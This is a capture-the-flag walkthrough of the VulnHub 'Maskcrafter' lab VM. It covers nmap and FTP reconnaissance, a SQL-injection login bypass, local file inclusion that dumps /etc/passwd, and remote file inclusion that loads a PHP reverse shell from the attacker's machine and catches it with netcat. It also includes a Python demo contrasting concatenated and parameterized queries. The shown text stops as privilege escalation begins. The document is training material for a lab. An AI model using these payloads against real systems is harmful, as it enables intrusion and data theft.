Maskcrafter
Identifying the target host's IP address
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
- Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
-
- 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
- _____________________________________________________________________________
- IP At MAC Address Count Len MAC Vendor / Hostname
- -----------------------------------------------------------------------------
- 192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
- 192.168.56.100 08:00:27:4c:3f:93 1 60 PCS Systemtechnik GmbH
- 192.168.56.254 08:00:27:1c:48:cc 1 60 PCS Systemtechnik GmbH
Using netdiscover on Kali Linux (ARP sweep of the host-only network), the target host is identified as 192.168.56.254; 192.168.56.1 and .100 are the VirtualBox host adapter and DHCP server.
Nmap scan
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
- Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-09 19:59 EDT
- Nmap scan report for www.armour.local (192.168.56.254)
- Host is up (0.000073s latency).
- Not shown: 65526 closed tcp ports (reset)
- PORT STATE SERVICE VERSION
- 21/tcp open ftp vsftpd 2.0.8 or later
- | ftp-anon: Anonymous FTP login allowed (FTP code 230)
- |_drwxr-xr-x 2 112 115 4096 Mar 30 2020 pub
- | ftp-syst:
- | STAT:
- | FTP server status:
- | Connected to 192.168.56.206
- | Logged in as ftp
- | TYPE: ASCII
- | No session bandwidth limit
- | Session timeout in seconds is 300
- | Control connection is plain text
- | Data connections will be plain text
- | At session startup, client count was 3
- | vsFTPd 3.0.3 - secure, fast, stable
- |_End of status
- 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
- | ssh-hostkey:
- | 2048 8f1b43230a248c66ad3da2b969334dd7 (RSA)
- | 256 8a2c857c2d9622f698f24ab67a88df23 (ECDSA)
- |_ 256 aca799159cbf6944d9c2962a8f799b6d (ED25519)
- 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
- | http-robots.txt: 1 disallowed entry
- |_/debug
- | http-title: Maskcrafter(TM) Login Page
- |_Requested resource was login.php
- |_http-server-header: Apache/2.4.29 (Ubuntu)
- 111/tcp open rpcbind 2-4 (RPC #100000)
- | rpcinfo:
- | program version port/proto service
- | 100000 2,3,4 111/tcp rpcbind
- | 100000 2,3,4 111/udp rpcbind
- | 100000 3,4 111/tcp6 rpcbind
- | 100000 3,4 111/udp6 rpcbind
- | 100003 3 2049/udp nfs
- | 100003 3 2049/udp6 nfs
- | 100003 3,4 2049/tcp nfs
- | 100003 3,4 2049/tcp6 nfs
- | 100005 1,2,3 35771/tcp6 mountd
- | 100005 1,2,3 35951/udp mountd
- | 100005 1,2,3 47498/udp6 mountd
- | 100005 1,2,3 50685/tcp mountd
- | 100021 1,3,4 45195/tcp6 nlockmgr
- | 100021 1,3,4 46199/tcp nlockmgr
- | 100021 1,3,4 48207/udp6 nlockmgr
- | 100021 1,3,4 53602/udp nlockmgr
- | 100227 3 2049/tcp nfs_acl
- | 100227 3 2049/tcp6 nfs_acl
- | 100227 3 2049/udp nfs_acl
- |_ 100227 3 2049/udp6 nfs_acl
- 2049/tcp open nfs_acl 3 (RPC #100227)
- 38041/tcp open mountd 1-3 (RPC #100005)
- 45351/tcp open mountd 1-3 (RPC #100005)
- 46199/tcp open nlockmgr 1-4 (RPC #100021)
- 50685/tcp open mountd 1-3 (RPC #100005)
- MAC Address: 08:00:27:1C:48:CC (Oracle VirtualBox virtual NIC)
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds
Getting a shell
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ ftp 192.168.56.254
- Connected to 192.168.56.254.
- 220 Welcome to maskcrafter(TM) FTP service.
- Name (192.168.56.254:kali): anonymous
- 331 Please specify the password.
- Password:
- 230 Login successful.
- Remote system type is UNIX.
- Using binary mode to transfer files.
- ftp> ls -alh
- 229 Entering Extended Passive Mode (|||28847|)
- 150 Here comes the directory listing.
- drwxr-xr-x 3 0 115 4096 Mar 21 2020 .
- drwxr-xr-x 3 0 115 4096 Mar 21 2020 ..
- drwxr-xr-x 2 112 115 4096 Mar 30 2020 pub
- 226 Directory send OK.
- ftp> cd pub
- 250 Directory successfully changed.
- ftp> ls -alh
- 229 Entering Extended Passive Mode (|||63424|)
- 150 Here comes the directory listing.
- drwxr-xr-x 2 112 115 4096 Mar 30 2020 .
- drwxr-xr-x 3 0 115 4096 Mar 21 2020 ..
- -rw-r--r-- 1 0 0 430 Mar 30 2020 NOTES.txt
- -rw-r--r-- 1 0 0 229 Mar 23 2020 cred.zip
- 226 Directory send OK.
- ftp> get NOTES.txt
- local: NOTES.txt remote: NOTES.txt
- 229 Entering Extended Passive Mode (|||15955|)
- 150 Opening BINARY mode data connection for NOTES.txt (430 bytes).
- 100% |********************************************************************************| 430 273.03 KiB/s 00:00 ETA
- 226 Transfer complete.
- 430 bytes received in 00:00 (224.31 KiB/s)
- ftp> get cred.zip
- local: cred.zip remote: cred.zip
- 229 Entering Extended Passive Mode (|||30982|)
- 150 Opening BINARY mode data connection for cred.zip (229 bytes).
- 100% |********************************************************************************| 229 427.59 KiB/s 00:00 ETA
- 226 Transfer complete.
- 229 bytes received in 00:00 (197.90 KiB/s)
- ftp> quit
- 221 Goodbye.
-
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ cat NOTES.txt
- Dear Web Administrator,
- I've got a few points to make:
- 1.) Please choose a stronger password for /debug web-directory.
- Having a username as 'admin' is already guessable but selecting a dictionary password is a big NO-NO.
- 2.) Please revisit the SQL code to prevent SQL injections because the way it is now, it is absolutely terrible.
- Basically, we are hoping and praying that no hacker ever finds out about this.
- Regards,
- Root
-
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ ls -alh
- total 20K
- drwxr-xr-x 2 kali kali 4.0K Apr 9 20:00 .
- drwxr-xr-x 83 kali kali 4.0K Apr 9 19:54 ..
- -rw-r--r-- 1 kali kali 229 Mar 23 2020 cred.zip
- -rw-r--r-- 1 root root 2.7K Apr 9 19:59 nmap_full_scan
- -rw-r--r-- 1 kali kali 430 Mar 29 2020 NOTES.txt
-
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ unzip cred.zip
- Archive: cred.zip
- [cred.zip] cred.txt password:
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ zip2john cred.zip > hashes
- ver 1.0 efh 5455 efh 7875 cred.zip/cred.txt PKZIP Encr: 2b chk, TS_chk, cmplen=47, decmplen=35, crc=5D29BC84 ts=63CD cs=63cd type=0
-
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
- Using default input encoding: UTF-8
- Loaded 1 password hash (PKZIP [32/64])
- Will run 2 OpenMP threads
- Press 'q' or Ctrl-C to abort, almost any other key for status
- 0g 0:00:00:01 DONE (2023-04-09 20:00) 0g/s 9562Kp/s 95
john did not recover the password of cred.zip from rockyou.txt, and the box author hinted that cracking is not the intended path, so the archive is set aside for now. Next, check the NFS exports that rpcbind advertised (ports 111 and 2049):
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ showmount -e 192.168.56.254
- Export list for 192.168.56.254:
The export list is empty: although nfs and mountd are registered with rpcbind, the target exports no NFS shares to this client.
Browsing to port 80 from Kali Linux shows a user login page (the "Maskcrafter(TM) Login Page" served by login.php that nmap reported). NOTES.txt already warned that the SQL code is "absolutely terrible", and indeed the login is bypassed trivially by entering admin' or 1=1 -- as the username: the quote closes the string literal, or 1=1 makes the WHERE clause always true, and -- (with the trailing space MySQL requires) comments out the password check.
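Why that input works, as an added example that is not part of the original write-up: a login script that builds its query by string concatenation lets the submitted username rewrite the statement. The Python below reproduces this against an in-memory SQLite table with constructed sample users (the real schema, passwords and login.php logic behind the target are unknown and assumed here) and shows the parameterized query that defeats the same payload.

```python
import sqlite3

PAYLOAD = "admin' or 1=1 -- "   # the username submitted on the Maskcrafter login page


def make_db():
    """Constructed sample users table; the real schema behind login.php is an assumption."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "S3cret!pass"), ("userx", "hunter2")],
    )
    return conn


def vulnerable_query(username, password):
    """Builds the statement the way a naive login.php would: by concatenation."""
    return (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )


def login_vulnerable(conn, username, password):
    """Returns the matched username or None. Attacker-controlled text becomes SQL."""
    row = conn.execute(vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with bound parameters: the input can only ever be a value, never syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    # The quote closes the literal, "or 1=1" is always true, "--" comments out the rest:
    #   SELECT username FROM users WHERE username = 'admin' or 1=1 -- ' AND password = 'whatever'
    print(vulnerable_query(PAYLOAD, "whatever"))
    print(login_vulnerable(conn, PAYLOAD, "whatever"))   # admin
    print(login_safe(conn, PAYLOAD, "whatever"))         # None
```

Two details worth noticing: with or 1=1 the vulnerable query returns whichever row the database lists first, not necessarily admin, so the attacker's identity depends on table order; and the target's "Welcome admin' or 1=1 -- !" banner shows the application echoing the raw submitted username rather than the matched account. MySQL (the target runs a mysql user) only treats -- as a comment when it is followed by whitespace, which is why the payload ends in a space; SQLite accepts it either way.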
After logging in, the page source contains the following comment and markup:
- <i>This webpage was created out of urgency and as such some features are still buggy and may not work as intended.</i><br><pre>DB connection ok.</pre><hr>Development in progress, please report any bugs to admin@covid19.localhost<pre>Due to the increase demand for our product, you are to ramp up your productivity by 200%, else suffer a pay cut!</pre>
- <html>
- <head><title>Employee page</title></head>
- <body>
- <h3>Welcome admin' or 1=1 -- !</h3>
-
- <a target="_blank" href="logout.php">Logout</a>
- </body>
- </html>
Follow the link from the page.
Requesting the URL below returns a page that looks unchanged, but the page parameter is worth noting: a script that includes whatever file a request parameter names is a classic candidate for local file inclusion (LFI).
- http://192.168.56.254/index.php?page=warning.php
Trying a directory traversal through the same parameter (extra ../ segments beyond / are harmless, so over-shooting the depth is fine):
- http://192.168.56.254/index.php?page=../../../../../etc/passwd
Requesting that URL returns the target's /etc/passwd, which confirms the LFI and also reveals the local users userx, researcherx and evdaez:
- root:x:0:0:root:/root:/bin/bash
- daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
- bin:x:2:2:bin:/bin:/usr/sbin/nologin
- sys:x:3:3:sys:/dev:/usr/sbin/nologin
- sync:x:4:65534:sync:/bin:/bin/sync
- games:x:5:60:games:/usr/games:/usr/sbin/nologin
- man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
- lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
- mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
- news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
- uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
- proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
- www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
- backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
- list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
- irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
- gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
- nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
- systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
- systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
- syslog:x:102:106::/home/syslog:/usr/sbin/nologin
- messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
- _apt:x:104:65534::/nonexistent:/usr/sbin/nologin
- lxd:x:105:65534::/var/lib/lxd/:/bin/false
- uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
- dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
- landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
- pollinate:x:109:1::/var/cache/pollinate:/bin/false
- sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
- userx:x:1000:1000:userx:/home/userx:/bin/bash
- mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
- researcherx:x:1001:1001:,,,:/home/researcherx:/bin/bash
- ftp:x:112:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
- statd:x:113:65534::/var/lib/nfs:/usr/sbin/nologin
- evdaez:x:1002:1002:,,,:/home/evdaez:/bin/bash
Next, test whether remote file inclusion (RFI) is possible as well.
Start an HTTP server on Kali Linux serving a test.txt (for example python3 -m http.server, which listens on port 8000 by default) and request:
- http://192.168.56.254/index.php?page=http://192.168.56.206:8000/test.txt
The response contains the contents of test.txt, so the target is vulnerable to remote file inclusion; this means its PHP has allow_url_include enabled, which is Off by default.
Next, prepare a PHP reverse shell on Kali Linux (shell.php, served from the same directory), start a netcat listener, and include the file through the same parameter to obtain a shell:
- http://192.168.56.254/index.php?page=http://192.168.56.206:8000/shell.php
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ sudo nc -nlvp 5555
- [sudo] password for kali:
- listening on [any] 5555 ...
- connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 39276
- Linux maskcrafter 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
- 08:15:22 up 17 min, 0 users, load average: 0.00, 0.00, 0.02
- USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- /bin/sh: 0: can't access tty; job control turned off
- $ which python
- /usr/bin/python
- $ python -c 'import pty;pty.spawn("/bin/bash")'
- www-data@maskcrafter:/$
Privilege escalation
- www-data@maskcrafter:/var/www/html$ cat db.php